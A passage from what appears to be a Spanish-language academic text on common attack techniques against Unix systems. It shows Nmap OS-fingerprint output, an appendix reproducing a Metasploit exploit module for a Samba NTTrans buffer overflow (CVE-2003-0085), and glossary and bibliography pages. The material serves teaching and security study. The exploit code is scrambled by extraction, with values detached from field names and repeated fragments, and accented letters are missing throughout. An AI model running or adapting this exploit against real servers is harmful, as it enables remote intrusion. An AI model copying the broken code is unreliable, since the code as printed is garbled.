ejecucin de cada uno de los 5 tests detallados en el apartado 5.1.1. Luego, como
no posee la firma del SO remoto en su BD, Nmap la imprime por pantalla. El SO
en cuestin es un FreeBSD 7.0, cuya firma la versin 4.53 de Nmap an no
posee175.
Luego de procesar un poco el texto del fingerprint (impreso as por Nmap a
propsito para facilitar el proceso de reporte del mismo), se puede obtener esto en
primera instancia:
SCAN(V=4.53 D=4/2 OT=21 CT=1 CU=30447 PV=Y DS=1 G=Y M=000C29 TM=47F3CB14
P=x86_64-unknown-linux-gnu)
SEQ(SP=105 GCD=2 ISR=108 TI=I II=I SS=S TS=21)
SEQ(SP=100 GCD=1 ISR=10E TI=I II=I SS=S TS=20)
SEQ(SP=104 GCD=1 ISR=10A TI=I II=I SS=S TS=21)
SEQ(SP=105 GCD=1 ISR=108 TI=I II=I SS=S TS=20)
SEQ(SP=105 GCD=1 ISR=107 TI=I II=I SS=S TS=21)
OPS(O1=M5B4NW3ST11 O2=M578NW3ST11 O3=M280NW3NNT11 O4=M5B4NW3ST11
O5=M218NW3ST11 O6=M109ST11)
WIN(W1=FFFF W2=FFFF W3=FFFF W4=FFFF W5=FFFF W6=FFFF)
ECN(R=Y DF=Y T=40 W=FFFF O=M5B4NW3SLN CC=N Q=)
T1(R=Y DF=Y T=40 S=O A=S+ F=AS RD=0 Q=)
T2(R=N)
T3(R=Y DF=Y T=40 W=FFFF S=O A=S+ F=AS O=M109NW3ST11 RD=0 Q=)
T4(R=Y DF=Y T=40 W=0 S=A A=Z F=R O= RD=0 Q=)
T5(R=Y DF=Y T=40 W=0 S=Z A=S+ F=AR O= RD=0 Q=)
T6(R=Y DF=Y T=40 W=0 S=A A=Z F=R O= RD=0 Q=)
T7(R=Y DF=Y T=40 W=0 S=Z A=S F=AR O= RD=0 Q=)
U1(R=Y DF=N T=40 TOS=0 IPL=38 UN=0 RIPL=G RID=G RIPCK=G RUCK=G RUL=G
RUD=G)
IE(R=Y DFI=S T=40 TOSI=S CD=S SI=S DLI=S)
175 Cabe aclarar que la ltima versin de Nmap, la 4.60 ya incluye la firma de este SO en su Base.
Tambin se puede obtener la ltima versin del archivo con la base de firmas de Nmap nmapos-db en la siguiente URL: http://nmap.org/data/nmap-os-db y luego reemplazar el original.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 186 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 187 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 188 de 210
##
# $Id: nttrans.rb 5365 2008-01-27 02:28:11Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Multi::Samba::NTTrans_Overflow < Msf::Exploit::Remote
include Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name'
'Description'
},
'Author'
'License'
'Version'
'References'
[
=> [ 'hdm' ],
=> MSF_LICENSE,
=> '$Revision: 5365 $',
=>
[ 'BID', '7106' ],
[ 'CVE', '2003-0085' ],
],
'Privileged'
'Payload'
=> true,
=>
{
'Space'
=> 1024,
'BadChars' => "\x00",
'MinNops' => 512,
},
'Targets'
=>
[
["Samba 2.2.x Linux x86",
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Rets' => [0x01020304, 0x41424344],
},
],
],
'DisclosureDate' => 'Apr 7 2003'))
register_options([Opt::RPORT(139)], self.class)
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 189 de 210
connect
smb_lgin
targ_address = 0xfffbb7d0
#
subcommand
param
body
setup_count
setup_data
data = param
=
=
=
=
=
+
1
' '
' '
0
' '
body
1 Payload '
'Payload '
'Payload '
1 Payload '
pkt
pkt
pkt
pkt
pkt
pkt
pkt
pkt
pkt
pkt
pkt
1 Payload '
1 Payload '
'Payload '
'Payload '
'Payload '
1 Payload '
1 Payload '
1 Payload '
'Payload '
'Payload '
'Payload '
[ 'SMB']
[ 'SMB']
['SMB']
[ 'SMB' ]
#
param = pattern
body = ' '
data = param + body
pkt = CONST: :SMB_NTTRANS_SECONDARY_PKT.make_struct
self .simple. client . smb_defaults(pkt [ ' Payload' ] [ 'SMB' ] )
base_offset = pkt .to_s .length - 4
param_offset = base_offset
data_offset = param_offset + param. length
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 190 de 210
pkt['Payload']['SMB'].v['Command'] =
CONST::SMB_COM_NT_TRANSACT_SECONDARY
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 18
pkt['Payload'].v['ParamCountTotal'] = param.length
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['ParamDisplace'] = targ_address
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['Payload'] = data
self.simple.client.smb_send(pkt.to_s)
ack =
self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)
handler
end
end
end
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 191 de 210
los
Sistemas.
Ver:
http://en.wikipedia.org/wiki/Process_%28computing%29
http://en.wikipedia.org/wiki/Thread_%28computer_science%29
Hash: Un Hash o funcin de dispersin es una funcin matemtica que a partir de un parmetro de
entrada, genera un valor nico de salida (cuyas probabilidades de ser generado por otro parmetro
son nfimas). Hay algoritmos de hash estndar, como por ejemplo MD5 y SHA-1.
Ver:http://en.wikipedia.org/wiki/Cryptographic_hash_function
Honeypot: Un honeypot (tarro de miel) es un sistema trampa instalado adrede para captar la
atencin de posbiles intrusos, probablemente con vulnerabilidades sencillas de vencer, con el
objetivo de desviar la atencin de los hosts que s son de importancia y monitorear los intentos de
ataque para bloquearlos y aprender las tcnicas utilizadas por los intrusos.
NAT Network Address Translation (Traduccin de Direcciones de Red): Tcnica para reescribir
la direccin origen o destino de un paquete IP en un dispositivo que maneja dichos paquetes. Por
ejemplo, es empleada comnmente en los dispositivos de acceso a internet para conmutar una
nica IP pblica entre varias IPs privadas de una LAN, entre otros usos muy frecuentes tambin.
Ver: http://en.wikipedia.org/wiki/Network_address_translation
Ofuscacin (software): Tcnica que modifica sustancialmente un programa sin alterar su
funcionamiento original, con el objetivo de camuflarlo o dificultar en gran medida su
comprensin por parte de terceros. Como efecto colateral puede significar tambin una compresin
del programa. Ver: http://en.wikipedia.org/wiki/Obfuscated_code
Opcode: Una instruccin de procesador se compone generalmente por un cdigo de operacin y
dos operandos. El primero en ingls se lo abrevia como Opcode, que bsicamente indica qu hacer
con los dos operandos que se le indica. Por ejemplo, en lenguaje ensamblador, MOV AX, BX es
una instruccin donde se copia el contenido del registro BX al AX (segn la nomenclatura de
Intel), y MOV es el Opcode. Otros Opcodes muy comunes en la arquitectura x86 incluyen JMP,
CMP, Call, ADD, MUL, PUSH, POP, etc.
Ver:
Tabla rpida de Opcodes 8086: http://www.jegerlehner.com/intel/opcode_es.html
Intel Architecture Software Developer's Manual, Volume 2: Instruction Set Reference Manual:
http://developer.intel.com/design/pentium/manuals/243191.htm
Penetration Testing: Test de penetracin; se lo conoce como un proceso tpico de las auditoras
de seguridad, donde se simula ser un cracker intentando vulnerar la seguridad de una organizacin
o de un sistema de la misma.
Proxy: Un proxy es un software o dispositivo que oficia de intermediario entre un cliente y un
servidor. Por ejemplo, un programa establece conexin con el proxy y le pide acceder a un cierto
equipo/servicio, por ejemplo una pgina web; el proxy accede por l y lo devuelve al programa
original, evitando que ste tenga que acceder directamente al proveedor.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 193 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 194 de 210
Bibliografa
ARPA_TFI: Arpanet - The First Internet, http://www.livinginternet.com/i/ii.htm
ART_APPFING: The Art of Fingerprinting - Slides,
http://md.hudora.de/presentations/#itunderground2005-2
BELL: Multics General Information and FAQ, http://www.belllabs.com/history/unix/somethingelse.html
CM_TX0: The TX-0: Its past and present, http://ed-thelen.org/comphist/TheCompMusRep/TCMR-V08.html
CRAY:Seymour Cray. Autor: Cray Inc., http://www.cray.com/about_cray/seymourcray.html
CSCO_INETBAS:Internetworking Basics. Autor: Cisco Systems,
http://www.cisco.com/en/US/docs/internetworking/technology/handbook/Intro-to-Internet.html
CUHI: Columbia University Computing History,
http://www.columbia.edu/acis/history/pdp10.html
CYBGEO: ARPANet Logical Map, http://www.cybergeography.org/atlas/historical.html
DEC-WEB: The DEC Emulation Web Page, http://www.aracnet.com/~healyzh/decemu.html
EBHL:The Heroic Hacker: Legends of the Computer Age. Autor: Erik Bunvand,
http://www.cs.utah.edu/~elb/folklore/afs-paper/afs-paper.html
ERBH:How To Become a Hacker. Autor: Eric Steven Raymond, http://catb.org/~esr/faqs/hackerhowto.html
ERHH:A Brief History of Hackerdom. Autor: Eric Steven Raymond, http://www.tuxedo.org/~esr
ERJF: The Jargon File, http://catb.org/jargon/
ERJFH:Trmino 'hacker'. Autor: Varios, Eric Raymond,
http://www.catb.org/jargon/html/H/hacker.html
FING_PAS:Know YourEnemy: Passive Fingerprinting. Autor: Craig Smith, Peter Grundl ,
http://project.honeynet.org/papers/finger/
FSF: Free Software Fundation, http://www.fsf.org/
FWALK:Firewalking - A Traceroute-Like Analysis of IP Packet Responses to Determine Gateway
Access Control Lists. Autor: David Goldsmith, Michael Schiffman,
http://www.packetfactory.net/firewalk/firewalk-final.pdf
GNU: GNU: GNU is not Unix, http://www.gnu.org/
HACK_BASICS:Hacking: The Basics. Autor: Zachary Wilson, Martin Poulin,
https://www2.sans.org/reading_room/whitepapers/hackers/955.php
HACK_BEW:Hackers Beware. Eric Cole, 2001, ISBN:0-7357-1009-0,
http://books.google.com.ar/books?id=fNRuUrhyd4QC
HACK_ETHIC:The Hacker Ethic and the Spirit of the Information Age. Himanen, Pekka;
Torvalds, Linus; Castells, Manuel, 2001, ISBN:ISBN 0-375-50566-0,
http://www.amazon.com/Hacker-Ethic-Pekka-Himanen/dp/0375505660
HACK_EXP:Hacking Exposed. Stuart McClure, Joel Scambray, George Kutz, 2005,
ISBN:9780072260816, http://www.amazon.com/Hacking-Exposed-5th/dp/0072260815
HACK_STACK:Hack the Stack. Michael Gregg, Stephen Watkins, George Mays, Chris Ries, Ron
Bandes, Brandon Franklin, 2006, ISBN:1-59749-109-8, http://books.google.com.ar/books?
id=t_0HYnWCdUoC